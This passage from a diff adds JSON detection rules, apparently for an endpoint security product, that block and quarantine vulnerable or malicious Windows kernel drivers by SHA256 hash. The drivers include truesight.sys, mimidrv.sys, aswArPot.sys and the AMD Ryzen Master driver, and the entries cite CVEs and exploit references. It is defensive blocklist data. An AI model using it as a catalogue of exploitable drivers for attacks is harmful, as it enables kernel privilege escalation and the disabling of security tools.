+ "value": "1f5e9fc579028d5cae916743528891aa39a4eecb3f573ea522eeb8da97f95953",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a21b981f-c3da-5b4a-a1d0-c11fc9a9c3ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974161Z",
+ "creation_date": "2026-03-23T11:45:29.974163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974168Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fda93c6e41212e86af07f57ca95db841161f00b08dae6304a51b467056e56280",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a21c0261-3771-5bdf-9fd0-fbd528436d99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975446Z",
+ "creation_date": "2026-03-23T11:45:29.975447Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "207b6cea0c9f7e94a912b388d5e9f7ace3b6405114f64bcc425042a09170fcac",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a22dd93f-87be-557e-a549-4feefefd7c0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144393Z",
+ "creation_date": "2026-03-23T11:45:31.144395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c49fe7af43a777e3d1b7e883e7e65e860deb8e35f189b8352828e7ab455d4fee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a237013c-9ab2-5934-b802-095b7fa58a61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811044Z",
+ "creation_date": "2026-03-23T11:45:31.811046Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811051Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e6c794dc342d12e520a6929450033914f16a982f0b1b786fac55ca1fb4232bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a25244de-f2ae-50e3-ae3d-ba508e93ad34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144253Z",
+ "creation_date": "2026-03-23T11:45:31.144255Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94a7a48ea51c0dbae5318bb697cda5ad00f20dbb7dfa6c0ea940e44d728c031c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2560996-b8a4-55b5-8f05-cb363a67e8fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810155Z",
+ "creation_date": "2026-03-23T11:45:31.810158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1d75a1d68c7754a5c16cae617bd8e0a37823bb0c9e83e2f7a122a5392eedb46",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a25c5fdc-4449-5c42-8870-90d96cc4fae4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492161Z",
+ "creation_date": "2026-03-23T11:45:31.492163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492169Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4589bf3f26fbbcfede64f606b98d9159ce7dd462928ac1775c668a7a658cf14f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a26e5896-d10f-502b-9ecc-5febacf092db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824312Z",
+ "creation_date": "2026-03-23T11:45:30.824315Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ac56a208b2f9eaa828d2351c5baf3b4cdb64092a026d7a5db4c78d40bb6ec04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2725a61-1891-595d-98e9-d0682faaa634",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828239Z",
+ "creation_date": "2026-03-23T11:45:30.828241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a7f1e339882a1c486f42016dcf9de3c29dbd630e81e77194ddb3eebab2e94fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2751907-6cfd-57d8-98ed-3976250da994",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617748Z",
+ "creation_date": "2026-03-23T11:45:29.617750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d041654d8cbf189c29919733fd40184ceaf0050295fc7a7e6e3f4cda45b5e090",
+ "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2899ca0-faaa-5f29-bd19-56420a9f2627",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141999Z",
+ "creation_date": "2026-03-23T11:45:31.142001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20d5f791ebf599b5ff1fcfcd1858c775b76bea553bd3cabee6798564d23ffc3f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a28ae5f9-3ff0-5ebc-b85c-39fd751a6247",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470102Z",
+ "creation_date": "2026-03-23T11:45:30.470105Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "938e65ff5760e44faf22a35242547c41a0d8d2b21a2f8a12f6b84d4055aad384",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2a3c80a-510e-5aa4-a50d-a447ab23c102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815765Z",
+ "creation_date": "2026-03-23T11:45:30.815768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815773Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1920889466cd5054e3ab6433a618e76c6671c3e806af8b3084c77c0e7648cbe",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2aaf45a-d91a-5b24-9ed1-78ba6346ad7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491443Z",
+ "creation_date": "2026-03-23T11:45:31.491447Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491455Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b63b01658504ef8de8de80ec30f9633837f646cadfbdce0612b6debbf4e8a54c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2c5307f-1bc4-52d2-b9ae-e369849db198",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816981Z",
+ "creation_date": "2026-03-23T11:45:30.816983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "145b3490f5d3f45dc014d8c14112e9973796024ef1e896a10998f08bba45d8e5",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2c86623-915d-5927-817a-e7a72481abe5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462736Z",
+ "creation_date": "2026-03-23T11:45:30.462739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462748Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2d3c370-1fd5-54fa-b5c0-324d7d30bda9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143373Z",
+ "creation_date": "2026-03-23T11:45:32.143375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccc65f108ad084af41725e42efc3c3c539f89a474c1b1293b111a83e3eba216a",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2dbeb41-b5cc-53ad-b21b-96fc832b6681",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817679Z",
+ "creation_date": "2026-03-23T11:45:30.817681Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be589c5c853c86703e23e3b77455bd0d4330bd5e612d0af538f98cc3c4cec1b4",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a2fa4a70-de4e-5f44-9746-73ea5b695760",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464341Z",
+ "creation_date": "2026-03-23T11:45:30.464344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a304ebc5-14cc-5e8d-b11b-98728178226e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968723Z",
+ "creation_date": "2026-03-23T11:45:29.968725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968730Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf086b30d80ae4a4e1d6cafecf511622f077493d52c4d729ede5d4ca6b4be02e",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a31223eb-322e-5a2d-91ae-723f63d5942e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490454Z",
+ "creation_date": "2026-03-23T11:45:31.490456Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490461Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b88c0b535bc65985dd945baaa524a400fc5a9366eafca8ac81adc5a070db975e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a31ef481-0fda-561d-8839-3d6143dd4216",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821708Z",
+ "creation_date": "2026-03-23T11:45:31.821710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dad6d1ef2fc1586320e76171fd16822be56b4eee1497e7c97e72ac4421065b27",
